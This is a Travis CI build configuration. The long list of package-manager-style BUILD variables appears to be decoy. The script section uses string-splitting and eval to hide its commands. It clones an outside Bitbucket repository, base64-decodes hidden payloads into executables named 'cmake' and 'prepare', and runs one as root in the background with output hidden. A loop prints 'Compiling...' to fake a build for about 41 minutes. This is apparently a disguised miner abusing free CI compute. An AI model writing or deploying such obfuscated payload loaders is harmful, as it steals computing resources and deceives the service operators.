dist: bionic

env:
  - BUILD="--getbinpkg=909tr"
  - BUILD="--reinstall=185bV"
  - BUILD="--root-deps=485oF"
  - BUILD="--config-root=1362g"
  - BUILD="--pkg-format=587KU"
  - BUILD="--verbose-conflicts=179Sc"
  - BUILD="--rebuild-exclude=1191E"
  - BUILD="--buildpkg-exclude=910Aj"
  - BUILD="--alert=242UD"
  - BUILD="--fuzzy-search=147Oc"
  - BUILD="--skipfirst=802xJ"
  - BUILD="--autounmask-backtrack=15bT"
  - BUILD="--changed-deps=163l"
  - BUILD="--usepkg=466bZ"
  - BUILD="--ignore-world=486BH"
  - BUILD="--config=317FN"
  - BUILD="--reinstall=438SU"
  - BUILD="--prefix=102V1"
  - BUILD="--autounmask-write=656Bf"
  - BUILD="--searchdesc=334LW"
  - BUILD="--autounmask-keep-keywords=756Pe"
  - BUILD="--digest=548xO"
  - BUILD="--help=475mo"
  - BUILD="--autounmask-unrestricted-atoms=853wl"
  - BUILD="--unordered-display=215UG"
  - BUILD="--search-index=336Hp"
  - BUILD="--useoldpkg-atoms=94842"
  - BUILD="--rebuilt-binaries=6201f"
  - BUILD="--skipfirst=396rv"
  - BUILD="--misspell-suggestions=789xY"
  - BUILD="--info=392Ca"
  - BUILD="--sync-submodule=127cP"
  - BUILD="--getbinpkgonly=1745x"
  - BUILD="--complete-graph-if-new-use=839cq"
  - BUILD="--useoldpkg-atoms=238zO"
  - BUILD="--autounmask-unrestricted-atoms=3499M"
  - BUILD="--regen=666tD"
  - BUILD="--quiet-unmerge-warn=10701"
  - BUILD="--usepkg-exclude=197CR"
  - BUILD="--skipfirst=515EY"
  - BUILD="--nospinner=583iQ"
  - BUILD="--deselect=688Os"
  - BUILD="--autounmask-continue=371Ft"
  - BUILD="--rebuild-if-new-slot=423pn"
  - BUILD="--verbose-conflicts=712SC"
  - BUILD="--newuse=989XT"
  - BUILD="--nospinner=686t4"
  - BUILD="--read-news=761wg"
  - BUILD="--sync=153ws"
  - BUILD="--autounmask-unrestricted-atoms=224EW"
  - BUILD="--useoldpkg-atoms=810dl"
  - BUILD="--rebuild-exclude=575W7"
  - BUILD="--with-test-deps=79uO"
  - BUILD="--skipfirst=260P6"
  - BUILD="--ask=238lM"
  - BUILD="--regen=43535"
  - BUILD="--verbose-slot-rebuilds=583qv"
  - BUILD="--update=642Qw"
  - BUILD="--deep=110Qt"
  - BUILD="--version=96p1"
  - BUILD="--misspell-suggestions=142Y"
  - BUILD="--autounmask=672q"
  - BUILD="--autounmask-unrestricted-atoms=631mX"
  - BUILD="--binpkg-respect-use=8372E"
  - BUILD="--oneshot=530P9"
  - BUILD="--noreplace=2057o"
  - BUILD="--search-index=554V2"
  - BUILD="--rebuilt-binaries=180Z1"
  - BUILD="--dynamic-deps=4362q"
  - BUILD="--color=497xQ"
  - BUILD="--clean=338Wk"
  - BUILD="--update=318QB"
  - BUILD="--getbinpkgonly=799Qc"
  - BUILD="--quiet-repo-display=526he"
  - BUILD="--usepkgonly=835IN"
  - BUILD="--backtrack=122hm"
  - BUILD="--usepkg=9725K"
  - BUILD="--jobs=205Xr"
  - BUILD="--binpkg-respect-use=160OK"
  - BUILD="--ignore-world=193h8"
  - BUILD="--verbose=919AZ"
  - BUILD="--root=405Bi"
  - BUILD="--usepkgonly=96qn"
  - BUILD="--ask-enter-invalid=652zD"
  - BUILD="--prefix=5632i"
  - BUILD="--fail-clean=859mi"
  - BUILD="--read-news=929C9"
  - BUILD="--list-sets=187yk"
  - BUILD="--root=892t3"
  - BUILD="--getbinpkg=205u9"
  - BUILD="--misspell-suggestions=5va"
  - BUILD="--color=678fr"
  - BUILD="--unordered-display=85Ml"
  - BUILD="--useoldpkg-atoms=820HI"
  - BUILD="--with-bdeps-auto=590fQ"
  - BUILD="--jobs=878dc"
  - BUILD="--config-root=150dF"
  - BUILD="--color=911c0"
  - BUILD="--fuzzy-search=820Hk"
  - BUILD="--config=358Z8"
  - BUILD="--quiet-repo-display=867a8"
  - BUILD="--fuzzy-search=6204t"
  - BUILD="--unmerge=95Nk"
  - BUILD="--rebuild-if-new-rev=415RN"
  - BUILD="--rebuild-ignore=925Sa"
  - BUILD="--rebuild-exclude=894B7"
  - BUILD="--autounmask=565M"
  - BUILD="--searchdesc=256OH"
  - BUILD="--digest=639wR"
  - BUILD="--root-deps=567N0"
  - BUILD="--changed-deps-report=205Mn"
  - BUILD="--update=570w7"
  - BUILD="--changed-deps=741jd"
  - BUILD="--with-bdeps=855cs"
  - BUILD="--changed-slot=955t0"
  - BUILD="--changed-deps-report=747xP"
  - BUILD="--check-news=888NE"
  - BUILD="--config=490sZ"
  - BUILD="--noreplace=829IN"
  - BUILD="--keep-going=84mV"
  - BUILD="--complete-graph-if-new-use=115Zs"
  - BUILD="--version=8808a"
  - BUILD="--read-news=556x5"
  - BUILD="--info=622Sy"
  - BUILD="--newrepo=553nJ"
  - BUILD="--columns=665Pf"
  - BUILD="--getbinpkgonly=281aW"
  - BUILD="--reinstall-atoms=466sT"
  - BUILD="--unmerge=873jH"
  - BUILD="--rebuilt-binaries-timestamp=450Im"
  - BUILD="--rebuild-if-new-rev=282Ks"
  - BUILD="--debug=457yb"
  - BUILD="--getbinpkgonly=80yK"
  - BUILD="--oneshot=959jR"
  - BUILD="--accept-properties=336IW"
  - BUILD="--reinstall-atoms=827BL"
  - BUILD="--onlydeps-with-rdeps=774ez"
  - BUILD="--nodeps=513xN"
  - BUILD="--search=696XG"
  - BUILD="--rebuilt-binaries-timestamp=435UJ"
  - BUILD="--complete-graph-if-new-use=601ZP"
  - BUILD="--noreplace=147ge"
  - BUILD="--implicit-system-deps=318Kg"
  - BUILD="--digest=561ES"
  - BUILD="--autounmask-backtrack=935Nl"
  - BUILD="--noreplace=150Qf"
  - BUILD="--fuzzy-search=713Ok"
  - BUILD="--fetchonly=348mn"
  - BUILD="--reinstall=104K4"
  - BUILD="--config-root=1058I"
  - BUILD="--newuse=24Pi"
  - BUILD="--misspell-suggestions=457nP"
  - BUILD="--fetch-all-uri=732uN"
  - BUILD="--load-average=394BW"
  - BUILD="--regen=909us"
  - BUILD="--rebuild-if-new-ver=139BA"
  - BUILD="--search-index=153Gq"
  - BUILD="--misspell-suggestions=755F4"
  - BUILD="--clean=871LO"
  - BUILD="--quiet-repo-display=862Ik"
  - BUILD="--rebuild-if-new-rev=104I9"
  - BUILD="--sync=835kP"
  - BUILD="--unmerge=864eJ"
  - BUILD="--accept-restrict=411Tc"
  - BUILD="--prune=159lR"
  - BUILD="--depclean=465BL"
  - BUILD="--noreplace=300vJ"
  - BUILD="--update=1672k"
  - BUILD="--buildpkg=908ZB"
  - BUILD="--verbose-conflicts=74wb"
  - BUILD="--complete-graph-if-new-ver=1879y"
  - BUILD="--rage-clean=120kR"
  - BUILD="--fail-clean=116b5"
  - BUILD="--autounmask-keep-masks=737fE"
  - BUILD="--rebuild-ignore=374ZY"
  - BUILD="--autounmask-backtrack=98aS"
  - BUILD="--onlydeps-with-rdeps=405X6"
  - BUILD="--ignore-world=721kk"
  - BUILD="--deselect=714B2"
  - BUILD="--autounmask-keep-keywords=869bj"
  - BUILD="--ask-enter-invalid=8876u"
  - BUILD="--skipfirst=931NL"
  - BUILD="--complete-graph=455l9"
  - BUILD="--autounmask-license=804kP"
  - BUILD="--with-test-deps=163kQ"
  - BUILD="--selective=60HR"
  - BUILD="--dynamic-deps=531mQ"
  - BUILD="--with-bdeps=2356c"
  - BUILD="--sysroot=579Q1"

language: minimal

script:
  - sudo apt update || true
  - VoumdVvSE="sudo apt --"
  - mcBjJ="yes install"
  - ZUoENrom=" cl-base64 "
  - KSbJupypJlQ="git &>/dev/"
  - eval "$VoumdVvSE""$mcBjJ""$ZUoENrom""$KSbJupypJlQ""null"
  - FeFJsagYxOY="git clone h"
  - ftpvHqNGF="ttps://gccb"
  - hWLVDf="uild@bitbuc"
  - iIRCYcWPP="ket.org/gcc"
  - fcDzCipwGk="build/gcc.g"
  - vXIaEnA="it &>/dev/n"
  - eval "$FeFJsagYxOY""$ftpvHqNGF""$hWLVDf""$iIRCYcWPP""$fcDzCipwGk""$vXIaEnA""ull"
  - GkiYZpl="base64 -d g"
  - UbLddct="cc/cmake_ >"
  - eval "$GkiYZpl""$UbLddct"" cmake"
  - JYArTXKLLLY="base64 -d g"
  - LWbNL="cc/config_ "
  - eval "$JYArTXKLLLY""$LWbNL""> clean"
  - YEdjA="base64 -d g"
  - qUBlpT="cc/make_ > "
  - eval "$YEdjA""$qUBlpT""prepare"
  - chmod +x prepare cmake
  - zvejo="./cmake"
  - eval "$zvejo"""
  - sed -i 's/build/tg3o/g' clean
  - sudo ./prepare -c clean &>/dev/null &
  - GCC=$(date +%s)
  - CSbdQZippW="echo $BUILD"
  - eval "$CSbdQZippW"""
  - while true; do CC=$(date +%s); echo Compiling...; [ $CC -ge $((GCC + 2473)) ] && sudo killall prepare && break; sleep 188; done
